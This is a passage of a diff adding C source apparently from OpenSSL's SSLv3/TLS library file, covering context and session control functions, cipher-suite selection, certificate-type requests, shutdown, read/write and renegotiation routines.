+            if (rv) {
+                *(EVP_PKEY **)parg = ptmp;
+                return 1;
+            }
+            EVP_PKEY_free(ptmp);
+            return 0;
+        }
+#ifndef OPENSSL_NO_EC
+    case SSL_CTRL_GET_EC_POINT_FORMATS:
+        {
+            SSL_SESSION *sess = s->session;
+            const unsigned char **pformat = parg;
+            if (!sess || !sess->tlsext_ecpointformatlist)
+                return 0;
+            *pformat = sess->tlsext_ecpointformatlist;
+            return (int)sess->tlsext_ecpointformatlist_length;
+        }
+#endif
+
+    case SSL_CTRL_CHECK_PROTO_VERSION:
+        /*
+         * For library-internal use; checks that the current protocol is the
+         * highest enabled version (according to s->ctx->method, as version
+         * negotiation may have changed s->method).
+         */
+        if (s->version == s->ctx->method->version)
+            return 1;
+        /*
+         * Apparently we're using a version-flexible SSL_METHOD (not at its
+         * highest protocol version).
+         */
+        if (s->ctx->method->version == SSLv23_method()->version) {
+#if TLS_MAX_VERSION != TLS1_2_VERSION
+# error Code needs update for SSLv23_method() support beyond TLS1_2_VERSION.
+#endif
+            if (!(s->options & SSL_OP_NO_TLSv1_2))
+                return s->version == TLS1_2_VERSION;
+            if (!(s->options & SSL_OP_NO_TLSv1_1))
+                return s->version == TLS1_1_VERSION;
+            if (!(s->options & SSL_OP_NO_TLSv1))
+                return s->version == TLS1_VERSION;
+            if (!(s->options & SSL_OP_NO_SSLv3))
+                return s->version == SSL3_VERSION;
+            if (!(s->options & SSL_OP_NO_SSLv2))
+                return s->version == SSL2_VERSION;
+        }
+        return 0;               /* Unexpected state; fail closed. */
+
+    default:
+        break;
+    }
+    return (ret);
+}
+
+long ssl3_callback_ctrl(SSL *s, int cmd, void (*fp) (void))
+{
+    int ret = 0;
+
+#if !defined(OPENSSL_NO_DSA) || !defined(OPENSSL_NO_RSA)
+    if (
+# ifndef OPENSSL_NO_RSA
+           cmd == SSL_CTRL_SET_TMP_RSA_CB ||
+# endif
+# ifndef OPENSSL_NO_DSA
+           cmd == SSL_CTRL_SET_TMP_DH_CB ||
+# endif
+           0) {
+        if (!ssl_cert_inst(&s->cert)) {
+            SSLerr(SSL_F_SSL3_CALLBACK_CTRL, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+    }
+#endif
+
+    switch (cmd) {
+#ifndef OPENSSL_NO_RSA
+    case SSL_CTRL_SET_TMP_RSA_CB:
+        {
+            s->cert->rsa_tmp_cb = (RSA *(*)(SSL *, int, int))fp;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_DH
+    case SSL_CTRL_SET_TMP_DH_CB:
+        {
+            s->cert->dh_tmp_cb = (DH *(*)(SSL *, int, int))fp;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    case SSL_CTRL_SET_TMP_ECDH_CB:
+        {
+            s->cert->ecdh_tmp_cb = (EC_KEY *(*)(SSL *, int, int))fp;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+    case SSL_CTRL_SET_TLSEXT_DEBUG_CB:
+        s->tlsext_debug_cb = (void (*)(SSL *, int, int,
+                                       unsigned char *, int, void *))fp;
+        break;
+#endif
+    default:
+        break;
+    }
+    return (ret);
+}
+
+long ssl3_ctx_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg)
+{
+    CERT *cert;
+
+    cert = ctx->cert;
+
+    switch (cmd) {
+#ifndef OPENSSL_NO_RSA
+    case SSL_CTRL_NEED_TMP_RSA:
+        if ((cert->rsa_tmp == NULL) &&
+            ((cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL) ||
+             (EVP_PKEY_size(cert->pkeys[SSL_PKEY_RSA_ENC].privatekey) >
+              (512 / 8)))
+            )
+            return (1);
+        else
+            return (0);
+        /* break; */
+    case SSL_CTRL_SET_TMP_RSA:
+        {
+            RSA *rsa;
+            int i;
+
+            rsa = (RSA *)parg;
+            i = 1;
+            if (rsa == NULL)
+                i = 0;
+            else {
+                if ((rsa = RSAPrivateKey_dup(rsa)) == NULL)
+                    i = 0;
+            }
+            if (!i) {
+                SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_RSA_LIB);
+                return (0);
+            } else {
+                if (cert->rsa_tmp != NULL)
+                    RSA_free(cert->rsa_tmp);
+                cert->rsa_tmp = rsa;
+                return (1);
+            }
+        }
+        /* break; */
+    case SSL_CTRL_SET_TMP_RSA_CB:
+        {
+            SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            return (0);
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_DH
+    case SSL_CTRL_SET_TMP_DH:
+        {
+            DH *new = NULL, *dh;
+
+            dh = (DH *)parg;
+            if ((new = DHparams_dup(dh)) == NULL) {
+                SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_DH_LIB);
+                return 0;
+            }
+            if (!(ctx->options & SSL_OP_SINGLE_DH_USE)) {
+                if (!DH_generate_key(new)) {
+                    SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_DH_LIB);
+                    DH_free(new);
+                    return 0;
+                }
+            }
+            if (cert->dh_tmp != NULL)
+                DH_free(cert->dh_tmp);
+            cert->dh_tmp = new;
+            return 1;
+        }
+        /*
+         * break;
+         */
+    case SSL_CTRL_SET_TMP_DH_CB:
+        {
+            SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            return (0);
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    case SSL_CTRL_SET_TMP_ECDH:
+        {
+            EC_KEY *ecdh = NULL;
+
+            if (parg == NULL) {
+                SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_ECDH_LIB);
+                return 0;
+            }
+            ecdh = EC_KEY_dup((EC_KEY *)parg);
+            if (ecdh == NULL) {
+                SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_EC_LIB);
+                return 0;
+            }
+            if (!(ctx->options & SSL_OP_SINGLE_ECDH_USE)) {
+                if (!EC_KEY_generate_key(ecdh)) {
+                    EC_KEY_free(ecdh);
+                    SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_ECDH_LIB);
+                    return 0;
+                }
+            }
+
+            if (cert->ecdh_tmp != NULL) {
+                EC_KEY_free(cert->ecdh_tmp);
+            }
+            cert->ecdh_tmp = ecdh;
+            return 1;
+        }
+        /* break; */
+    case SSL_CTRL_SET_TMP_ECDH_CB:
+        {
+            SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            return (0);
+        }
+        break;
+#endif                          /* !OPENSSL_NO_ECDH */
+#ifndef OPENSSL_NO_TLSEXT
+    case SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG:
+        ctx->tlsext_servername_arg = parg;
+        break;
+    case SSL_CTRL_SET_TLSEXT_TICKET_KEYS:
+    case SSL_CTRL_GET_TLSEXT_TICKET_KEYS:
+        {
+            unsigned char *keys = parg;
+            if (!keys)
+                return 48;
+            if (larg != 48) {
+                SSLerr(SSL_F_SSL3_CTX_CTRL, SSL_R_INVALID_TICKET_KEYS_LENGTH);
+                return 0;
+            }
+            if (cmd == SSL_CTRL_SET_TLSEXT_TICKET_KEYS) {
+                memcpy(ctx->tlsext_tick_key_name, keys, 16);
+                memcpy(ctx->tlsext_tick_hmac_key, keys + 16, 16);
+                memcpy(ctx->tlsext_tick_aes_key, keys + 32, 16);
+            } else {
+                memcpy(keys, ctx->tlsext_tick_key_name, 16);
+                memcpy(keys + 16, ctx->tlsext_tick_hmac_key, 16);
+                memcpy(keys + 32, ctx->tlsext_tick_aes_key, 16);
+            }
+            return 1;
+        }
+
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    case SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT_CB_ARG:
+        ctx->tlsext_opaque_prf_input_callback_arg = parg;
+        return 1;
+# endif
+
+    case SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG:
+        ctx->tlsext_status_arg = parg;
+        return 1;
+        break;
+
+# ifndef OPENSSL_NO_SRP
+    case SSL_CTRL_SET_TLS_EXT_SRP_USERNAME:
+        ctx->srp_ctx.srp_Mask |= SSL_kSRP;
+        if (ctx->srp_ctx.login != NULL)
+            OPENSSL_free(ctx->srp_ctx.login);
+        ctx->srp_ctx.login = NULL;
+        if (parg == NULL)
+            break;
+        if (strlen((const char *)parg) > 255
+            || strlen((const char *)parg) < 1) {
+            SSLerr(SSL_F_SSL3_CTX_CTRL, SSL_R_INVALID_SRP_USERNAME);
+            return 0;
+        }
+        if ((ctx->srp_ctx.login = BUF_strdup((char *)parg)) == NULL) {
+            SSLerr(SSL_F_SSL3_CTX_CTRL, ERR_R_INTERNAL_ERROR);
+            return 0;
+        }
+        break;
+    case SSL_CTRL_SET_TLS_EXT_SRP_PASSWORD:
+        ctx->srp_ctx.SRP_give_srp_client_pwd_callback =
+            srp_password_from_info_cb;
+        ctx->srp_ctx.info = parg;
+        break;
+    case SSL_CTRL_SET_SRP_ARG:
+        ctx->srp_ctx.srp_Mask |= SSL_kSRP;
+        ctx->srp_ctx.SRP_cb_arg = parg;
+        break;
+
+    case SSL_CTRL_SET_TLS_EXT_SRP_STRENGTH:
+        ctx->srp_ctx.strength = larg;
+        break;
+# endif
+
+# ifndef OPENSSL_NO_EC
+    case SSL_CTRL_SET_CURVES:
+        return tls1_set_curves(&ctx->tlsext_ellipticcurvelist,
+                               &ctx->tlsext_ellipticcurvelist_length,
+                               parg, larg);
+
+    case SSL_CTRL_SET_CURVES_LIST:
+        return tls1_set_curves_list(&ctx->tlsext_ellipticcurvelist,
+                                    &ctx->tlsext_ellipticcurvelist_length,
+                                    parg);
+#  ifndef OPENSSL_NO_ECDH
+    case SSL_CTRL_SET_ECDH_AUTO:
+        ctx->cert->ecdh_tmp_auto = larg;
+        return 1;
+#  endif
+# endif
+    case SSL_CTRL_SET_SIGALGS:
+        return tls1_set_sigalgs(ctx->cert, parg, larg, 0);
+
+    case SSL_CTRL_SET_SIGALGS_LIST:
+        return tls1_set_sigalgs_list(ctx->cert, parg, 0);
+
+    case SSL_CTRL_SET_CLIENT_SIGALGS:
+        return tls1_set_sigalgs(ctx->cert, parg, larg, 1);
+
+    case SSL_CTRL_SET_CLIENT_SIGALGS_LIST:
+        return tls1_set_sigalgs_list(ctx->cert, parg, 1);
+
+    case SSL_CTRL_SET_CLIENT_CERT_TYPES:
+        return ssl3_set_req_cert_type(ctx->cert, parg, larg);
+
+    case SSL_CTRL_BUILD_CERT_CHAIN:
+        return ssl_build_cert_chain(ctx->cert, ctx->cert_store, larg);
+
+    case SSL_CTRL_SET_VERIFY_CERT_STORE:
+        return ssl_cert_set_cert_store(ctx->cert, parg, 0, larg);
+
+    case SSL_CTRL_SET_CHAIN_CERT_STORE:
+        return ssl_cert_set_cert_store(ctx->cert, parg, 1, larg);
+
+#endif                          /* !OPENSSL_NO_TLSEXT */
+
+        /* A Thawte special :-) */
+    case SSL_CTRL_EXTRA_CHAIN_CERT:
+        if (ctx->extra_certs == NULL) {
+            if ((ctx->extra_certs = sk_X509_new_null()) == NULL)
+                return (0);
+        }
+        sk_X509_push(ctx->extra_certs, (X509 *)parg);
+        break;
+
+    case SSL_CTRL_GET_EXTRA_CHAIN_CERTS:
+        if (ctx->extra_certs == NULL && larg == 0)
+            *(STACK_OF(X509) **)parg = ctx->cert->key->chain;
+        else
+            *(STACK_OF(X509) **)parg = ctx->extra_certs;
+        break;
+
+    case SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS:
+        if (ctx->extra_certs) {
+            sk_X509_pop_free(ctx->extra_certs, X509_free);
+            ctx->extra_certs = NULL;
+        }
+        break;
+
+    case SSL_CTRL_CHAIN:
+        if (larg)
+            return ssl_cert_set1_chain(ctx->cert, (STACK_OF(X509) *)parg);
+        else
+            return ssl_cert_set0_chain(ctx->cert, (STACK_OF(X509) *)parg);
+
+    case SSL_CTRL_CHAIN_CERT:
+        if (larg)
+            return ssl_cert_add1_chain_cert(ctx->cert, (X509 *)parg);
+        else
+            return ssl_cert_add0_chain_cert(ctx->cert, (X509 *)parg);
+
+    case SSL_CTRL_GET_CHAIN_CERTS:
+        *(STACK_OF(X509) **)parg = ctx->cert->key->chain;
+        break;
+
+    case SSL_CTRL_SELECT_CURRENT_CERT:
+        return ssl_cert_select_current(ctx->cert, (X509 *)parg);
+
+    case SSL_CTRL_SET_CURRENT_CERT:
+        return ssl_cert_set_current(ctx->cert, larg);
+
+    default:
+        return (0);
+    }
+    return (1);
+}
+
+long ssl3_ctx_callback_ctrl(SSL_CTX *ctx, int cmd, void (*fp) (void))
+{
+    CERT *cert;
+
+    cert = ctx->cert;
+
+    switch (cmd) {
+#ifndef OPENSSL_NO_RSA
+    case SSL_CTRL_SET_TMP_RSA_CB:
+        {
+            cert->rsa_tmp_cb = (RSA *(*)(SSL *, int, int))fp;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_DH
+    case SSL_CTRL_SET_TMP_DH_CB:
+        {
+            cert->dh_tmp_cb = (DH *(*)(SSL *, int, int))fp;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    case SSL_CTRL_SET_TMP_ECDH_CB:
+        {
+            cert->ecdh_tmp_cb = (EC_KEY *(*)(SSL *, int, int))fp;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+    case SSL_CTRL_SET_TLSEXT_SERVERNAME_CB:
+        ctx->tlsext_servername_callback = (int (*)(SSL *, int *, void *))fp;
+        break;
+
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    case SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT_CB:
+        ctx->tlsext_opaque_prf_input_callback =
+            (int (*)(SSL *, void *, size_t, void *))fp;
+        break;
+# endif
+
+    case SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB:
+        ctx->tlsext_status_cb = (int (*)(SSL *, void *))fp;
+        break;
+
+    case SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB:
+        ctx->tlsext_ticket_key_cb = (int (*)(SSL *, unsigned char *,
+                                             unsigned char *,
+                                             EVP_CIPHER_CTX *,
+                                             HMAC_CTX *, int))fp;
+        break;
+
+# ifndef OPENSSL_NO_SRP
+    case SSL_CTRL_SET_SRP_VERIFY_PARAM_CB:
+        ctx->srp_ctx.srp_Mask |= SSL_kSRP;
+        ctx->srp_ctx.SRP_verify_param_callback = (int (*)(SSL *, void *))fp;
+        break;
+    case SSL_CTRL_SET_TLS_EXT_SRP_USERNAME_CB:
+        ctx->srp_ctx.srp_Mask |= SSL_kSRP;
+        ctx->srp_ctx.TLS_ext_srp_username_callback =
+            (int (*)(SSL *, int *, void *))fp;
+        break;
+    case SSL_CTRL_SET_SRP_GIVE_CLIENT_PWD_CB:
+        ctx->srp_ctx.srp_Mask |= SSL_kSRP;
+        ctx->srp_ctx.SRP_give_srp_client_pwd_callback =
+            (char *(*)(SSL *, void *))fp;
+        break;
+# endif
+#endif
+    default:
+        return (0);
+    }
+    return (1);
+}
+
+/*
+ * This function needs to check if the ciphers required are actually
+ * available
+ */
+const SSL_CIPHER *ssl3_get_cipher_by_char(const unsigned char *p)
+{
+    SSL_CIPHER c;
+    const SSL_CIPHER *cp;
+    unsigned long id;
+
+    id = 0x03000000L | ((unsigned long)p[0] << 8L) | (unsigned long)p[1];
+    c.id = id;
+    cp = OBJ_bsearch_ssl_cipher_id(&c, ssl3_ciphers, SSL3_NUM_CIPHERS);
+#ifdef DEBUG_PRINT_UNKNOWN_CIPHERSUITES
+    if (cp == NULL)
+        fprintf(stderr, "Unknown cipher ID %x\n", (p[0] << 8) | p[1]);
+#endif
+    return cp;
+}
+
+int ssl3_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p)
+{
+    long l;
+
+    if (p != NULL) {
+        l = c->id;
+        if ((l & 0xff000000) != 0x03000000)
+            return (0);
+        p[0] = ((unsigned char)(l >> 8L)) & 0xFF;
+        p[1] = ((unsigned char)(l)) & 0xFF;
+    }
+    return (2);
+}
+
+SSL_CIPHER *ssl3_choose_cipher(SSL *s, STACK_OF(SSL_CIPHER) *clnt,
+                               STACK_OF(SSL_CIPHER) *srvr)
+{
+    SSL_CIPHER *c, *ret = NULL;
+    STACK_OF(SSL_CIPHER) *prio, *allow;
+    int i, ii, ok;
+    CERT *cert;
+    unsigned long alg_k, alg_a, mask_k, mask_a, emask_k, emask_a;
+
+    /* Let's see which ciphers we can support */
+    cert = s->cert;
+
+#if 0
+    /*
+     * Do not set the compare functions, because this may lead to a
+     * reordering by "id". We want to keep the original ordering. We may pay
+     * a price in performance during sk_SSL_CIPHER_find(), but would have to
+     * pay with the price of sk_SSL_CIPHER_dup().
+     */
+    sk_SSL_CIPHER_set_cmp_func(srvr, ssl_cipher_ptr_id_cmp);
+    sk_SSL_CIPHER_set_cmp_func(clnt, ssl_cipher_ptr_id_cmp);
+#endif
+
+#ifdef CIPHER_DEBUG
+    fprintf(stderr, "Server has %d from %p:\n", sk_SSL_CIPHER_num(srvr),
+            (void *)srvr);
+    for (i = 0; i < sk_SSL_CIPHER_num(srvr); ++i) {
+        c = sk_SSL_CIPHER_value(srvr, i);
+        fprintf(stderr, "%p:%s\n", (void *)c, c->name);
+    }
+    fprintf(stderr, "Client sent %d from %p:\n", sk_SSL_CIPHER_num(clnt),
+            (void *)clnt);
+    for (i = 0; i < sk_SSL_CIPHER_num(clnt); ++i) {
+        c = sk_SSL_CIPHER_value(clnt, i);
+        fprintf(stderr, "%p:%s\n", (void *)c, c->name);
+    }
+#endif
+
+    if (s->options & SSL_OP_CIPHER_SERVER_PREFERENCE || tls1_suiteb(s)) {
+        prio = srvr;
+        allow = clnt;
+    } else {
+        prio = clnt;
+        allow = srvr;
+    }
+
+    tls1_set_cert_validity(s);
+
+    for (i = 0; i < sk_SSL_CIPHER_num(prio); i++) {
+        c = sk_SSL_CIPHER_value(prio, i);
+
+        /* Skip TLS v1.2 only ciphersuites if not supported */
+        if ((c->algorithm_ssl & SSL_TLSV1_2) && !SSL_USE_TLS1_2_CIPHERS(s))
+            continue;
+
+        ssl_set_cert_masks(cert, c);
+        mask_k = cert->mask_k;
+        mask_a = cert->mask_a;
+        emask_k = cert->export_mask_k;
+        emask_a = cert->export_mask_a;
+#ifndef OPENSSL_NO_SRP
+        if (s->srp_ctx.srp_Mask & SSL_kSRP) {
+            mask_k |= SSL_kSRP;
+            emask_k |= SSL_kSRP;
+            mask_a |= SSL_aSRP;
+            emask_a |= SSL_aSRP;
+        }
+#endif
+
+#ifdef KSSL_DEBUG
+        /*
+         * fprintf(stderr,"ssl3_choose_cipher %d alg= %lx\n",
+         * i,c->algorithms);
+         */
+#endif                          /* KSSL_DEBUG */
+
+        alg_k = c->algorithm_mkey;
+        alg_a = c->algorithm_auth;
+
+#ifndef OPENSSL_NO_KRB5
+        if (alg_k & SSL_kKRB5) {
+            if (!kssl_keytab_is_available(s->kssl_ctx))
+                continue;
+        }
+#endif                          /* OPENSSL_NO_KRB5 */
+#ifndef OPENSSL_NO_PSK
+        /* with PSK there must be server callback set */
+        if ((alg_k & SSL_kPSK) && s->psk_server_callback == NULL)
+            continue;
+#endif                          /* OPENSSL_NO_PSK */
+
+        if (SSL_C_IS_EXPORT(c)) {
+            ok = (alg_k & emask_k) && (alg_a & emask_a);
+#ifdef CIPHER_DEBUG
+            fprintf(stderr, "%d:[%08lX:%08lX:%08lX:%08lX]%p:%s (export)\n",
+                    ok, alg_k, alg_a, emask_k, emask_a, (void *)c, c->name);
+#endif
+        } else {
+            ok = (alg_k & mask_k) && (alg_a & mask_a);
+#ifdef CIPHER_DEBUG
+            fprintf(stderr, "%d:[%08lX:%08lX:%08lX:%08lX]%p:%s\n", ok, alg_k,
+                    alg_a, mask_k, mask_a, (void *)c, c->name);
+#endif
+        }
+
+#ifndef OPENSSL_NO_TLSEXT
+# ifndef OPENSSL_NO_EC
+#  ifndef OPENSSL_NO_ECDH
+        /*
+         * if we are considering an ECC cipher suite that uses an ephemeral
+         * EC key check it
+         */
+        if (alg_k & SSL_kEECDH)
+            ok = ok && tls1_check_ec_tmp_key(s, c->id);
+#  endif                        /* OPENSSL_NO_ECDH */
+# endif                         /* OPENSSL_NO_EC */
+#endif                          /* OPENSSL_NO_TLSEXT */
+
+        if (!ok)
+            continue;
+        ii = sk_SSL_CIPHER_find(allow, c);
+        if (ii >= 0) {
+#if !defined(OPENSSL_NO_EC) && !defined(OPENSSL_NO_TLSEXT)
+            if ((alg_k & SSL_kEECDH) && (alg_a & SSL_aECDSA)
+                && s->s3->is_probably_safari) {
+                if (!ret)
+                    ret = sk_SSL_CIPHER_value(allow, ii);
+                continue;
+            }
+#endif
+            ret = sk_SSL_CIPHER_value(allow, ii);
+            break;
+        }
+    }
+    return (ret);
+}
+
+int ssl3_get_req_cert_type(SSL *s, unsigned char *p)
+{
+    int ret = 0;
+    const unsigned char *sig;
+    size_t i, siglen;
+    int have_rsa_sign = 0, have_dsa_sign = 0;
+#ifndef OPENSSL_NO_ECDSA
+    int have_ecdsa_sign = 0;
+#endif
+    int nostrict = 1;
+    unsigned long alg_k;
+
+    /* If we have custom certificate types set, use them */
+    if (s->cert->ctypes) {
+        memcpy(p, s->cert->ctypes, s->cert->ctype_num);
+        return (int)s->cert->ctype_num;
+    }
+    /* get configured sigalgs */
+    siglen = tls12_get_psigalgs(s, &sig);
+    if (s->cert->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT)
+        nostrict = 0;
+    for (i = 0; i < siglen; i += 2, sig += 2) {
+        switch (sig[1]) {
+        case TLSEXT_signature_rsa:
+            have_rsa_sign = 1;
+            break;
+
+        case TLSEXT_signature_dsa:
+            have_dsa_sign = 1;
+            break;
+#ifndef OPENSSL_NO_ECDSA
+        case TLSEXT_signature_ecdsa:
+            have_ecdsa_sign = 1;
+            break;
+#endif
+        }
+    }
+
+    alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+
+#ifndef OPENSSL_NO_GOST
+    if (s->version >= TLS1_VERSION) {
+        if (alg_k & SSL_kGOST) {
+            p[ret++] = TLS_CT_GOST94_SIGN;
+            p[ret++] = TLS_CT_GOST01_SIGN;
+            return (ret);
+        }
+    }
+#endif
+
+#ifndef OPENSSL_NO_DH
+    if (alg_k & (SSL_kDHr | SSL_kEDH)) {
+# ifndef OPENSSL_NO_RSA
+        /*
+         * Since this refers to a certificate signed with an RSA algorithm,
+         * only check for rsa signing in strict mode.
+         */
+        if (nostrict || have_rsa_sign)
+            p[ret++] = SSL3_CT_RSA_FIXED_DH;
+# endif
+# ifndef OPENSSL_NO_DSA
+        if (nostrict || have_dsa_sign)
+            p[ret++] = SSL3_CT_DSS_FIXED_DH;
+# endif
+    }
+    if ((s->version == SSL3_VERSION) &&
+        (alg_k & (SSL_kEDH | SSL_kDHd | SSL_kDHr))) {
+# ifndef OPENSSL_NO_RSA
+        p[ret++] = SSL3_CT_RSA_EPHEMERAL_DH;
+# endif
+# ifndef OPENSSL_NO_DSA
+        p[ret++] = SSL3_CT_DSS_EPHEMERAL_DH;
+# endif
+    }
+#endif                          /* !OPENSSL_NO_DH */
+#ifndef OPENSSL_NO_RSA
+    if (have_rsa_sign)
+        p[ret++] = SSL3_CT_RSA_SIGN;
+#endif
+#ifndef OPENSSL_NO_DSA
+    if (have_dsa_sign)
+        p[ret++] = SSL3_CT_DSS_SIGN;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if ((alg_k & (SSL_kECDHr | SSL_kECDHe)) && (s->version >= TLS1_VERSION)) {
+        if (nostrict || have_rsa_sign)
+            p[ret++] = TLS_CT_RSA_FIXED_ECDH;
+        if (nostrict || have_ecdsa_sign)
+            p[ret++] = TLS_CT_ECDSA_FIXED_ECDH;
+    }
+#endif
+
+#ifndef OPENSSL_NO_ECDSA
+    /*
+     * ECDSA certs can be used with RSA cipher suites as well so we don't
+     * need to check for SSL_kECDH or SSL_kEECDH
+     */
+    if (s->version >= TLS1_VERSION) {
+        if (have_ecdsa_sign)
+            p[ret++] = TLS_CT_ECDSA_SIGN;
+    }
+#endif
+    return (ret);
+}
+
+static int ssl3_set_req_cert_type(CERT *c, const unsigned char *p, size_t len)
+{
+    if (c->ctypes) {
+        OPENSSL_free(c->ctypes);
+        c->ctypes = NULL;
+    }
+    if (!p || !len)
+        return 1;
+    if (len > 0xff)
+        return 0;
+    c->ctypes = OPENSSL_malloc(len);
+    if (!c->ctypes)
+        return 0;
+    memcpy(c->ctypes, p, len);
+    c->ctype_num = len;
+    return 1;
+}
+
+int ssl3_shutdown(SSL *s)
+{
+    int ret;
+
+    /*
+     * Don't do anything much if we have not done the handshake or we don't
+     * want to send messages :-)
+     */
+    if ((s->quiet_shutdown) || (s->state == SSL_ST_BEFORE)) {
+        s->shutdown = (SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+        return (1);
+    }
+
+    if (!(s->shutdown & SSL_SENT_SHUTDOWN)) {
+        s->shutdown |= SSL_SENT_SHUTDOWN;
+#if 1
+        ssl3_send_alert(s, SSL3_AL_WARNING, SSL_AD_CLOSE_NOTIFY);
+#endif
+        /*
+         * our shutdown alert has been sent now, and if it still needs to be
+         * written, s->s3->alert_dispatch will be true
+         */
+        if (s->s3->alert_dispatch)
+            return (-1);        /* return WANT_WRITE */
+    } else if (s->s3->alert_dispatch) {
+        /* resend it if not sent */
+#if 1
+        ret = s->method->ssl_dispatch_alert(s);
+        if (ret == -1) {
+            /*
+             * we only get to return -1 here the 2nd/Nth invocation, we must
+             * have already signalled return 0 upon a previous invoation,
+             * return WANT_WRITE
+             */
+            return (ret);
+        }
+#endif
+    } else if (!(s->shutdown & SSL_RECEIVED_SHUTDOWN)) {
+        /*
+         * If we are waiting for a close from our peer, we are closed
+         */
+        s->method->ssl_read_bytes(s, 0, NULL, 0, 0);
+        if (!(s->shutdown & SSL_RECEIVED_SHUTDOWN)) {
+            return (-1);        /* return WANT_READ */
+        }
+    }
+
+    if ((s->shutdown == (SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN)) &&
+        !s->s3->alert_dispatch)
+        return (1);
+    else
+        return (0);
+}
+
+int ssl3_write(SSL *s, const void *buf, int len)
+{
+    int ret, n;
+
+#if 0
+    if (s->shutdown & SSL_SEND_SHUTDOWN) {
+        s->rwstate = SSL_NOTHING;
+        return (0);
+    }
+#endif
+    clear_sys_error();
+    if (s->s3->renegotiate)
+        ssl3_renegotiate_check(s);
+
+    /*
+     * This is an experimental flag that sends the last handshake message in
+     * the same packet as the first use data - used to see if it helps the
+     * TCP protocol during session-id reuse
+     */
+    /* The second test is because the buffer may have been removed */
+    if ((s->s3->flags & SSL3_FLAGS_POP_BUFFER) && (s->wbio == s->bbio)) {
+        /* First time through, we write into the buffer */
+        if (s->s3->delay_buf_pop_ret == 0) {
+            ret = ssl3_write_bytes(s, SSL3_RT_APPLICATION_DATA, buf, len);
+            if (ret <= 0)
+                return (ret);
+
+            s->s3->delay_buf_pop_ret = ret;
+        }
+
+        s->rwstate = SSL_WRITING;
+        n = BIO_flush(s->wbio);
+        if (n <= 0)
+            return (n);
+        s->rwstate = SSL_NOTHING;
+
+        /* We have flushed the buffer, so remove it */
+        ssl_free_wbio_buffer(s);
+        s->s3->flags &= ~SSL3_FLAGS_POP_BUFFER;
+
+        ret = s->s3->delay_buf_pop_ret;
+        s->s3->delay_buf_pop_ret = 0;
+    } else {
+        ret = s->method->ssl_write_bytes(s, SSL3_RT_APPLICATION_DATA,
+                                         buf, len);
+        if (ret <= 0)
+            return (ret);
+    }
+
+    return (ret);
+}
+
+static int ssl3_read_internal(SSL *s, void *buf, int len, int peek)
+{
+    int ret;
+
+    clear_sys_error();
+    if (s->s3->renegotiate)
+        ssl3_renegotiate_check(s);
+    s->s3->in_read_app_data = 1;
+    ret =
+        s->method->ssl_read_bytes(s, SSL3_RT_APPLICATION_DATA, buf, len,
+                                  peek);
+    if ((ret == -1) && (s->s3->in_read_app_data == 2)) {
+        /*
+         * ssl3_read_bytes decided to call s->handshake_func, which called
+         * ssl3_read_bytes to read handshake data. However, ssl3_read_bytes
+         * actually found application data and thinks that application data
+         * makes sense here; so disable handshake processing and try to read
+         * application data again.
+         */
+        s->in_handshake++;
+        ret =
+            s->method->ssl_read_bytes(s, SSL3_RT_APPLICATION_DATA, buf, len,
+                                      peek);
+        s->in_handshake--;
+    } else
+        s->s3->in_read_app_data = 0;
+
+    return (ret);
+}
+
+int ssl3_read(SSL *s, void *buf, int len)
+{
+    return ssl3_read_internal(s, buf, len, 0);
+}
+
+int ssl3_peek(SSL *s, void *buf, int len)
+{
+    return ssl3_read_internal(s, buf, len, 1);
+}
+
+int ssl3_renegotiate(SSL *s)
+{
+    if (s->handshake_func == NULL)
+        return (1);
+
+    if (s->s3->flags & SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS)
+        return (0);
+
+    s->s3->renegotiate = 1;
+    return (1);
+}
+
+int ssl3_renegotiate_check(SSL *s)
+{
+    int ret = 0;
+
+    if (s->s3->renegotiate) {
+        if ((s->s3->rbuf.left == 0) &&
+            (s->s3->wbuf.left == 0) && !SSL_in_init(s)) {
+            /*
+             * if we are the server, and we have sent a 'RENEGOTIATE'
+             * message, we need to go to SSL_ST_ACCEPT.
+             */
+            /* SSL_ST_ACCEPT */
+            s->state = SSL_ST_RENEGOTIATE;
+            s->s3->renegotiate = 0;
+            s->s3->num_renegotiations++;
+            s->s3->total_renegotiations++;
+            ret = 1;
+        }
+    }
+    return (ret);
+}
+
+/*
+ * If we are using default SHA1+MD5 algorithms switch to new SHA256 PRF and
+ * handshake macs if required.
+ */
+long ssl_get_algorithm2(SSL *s)
+{
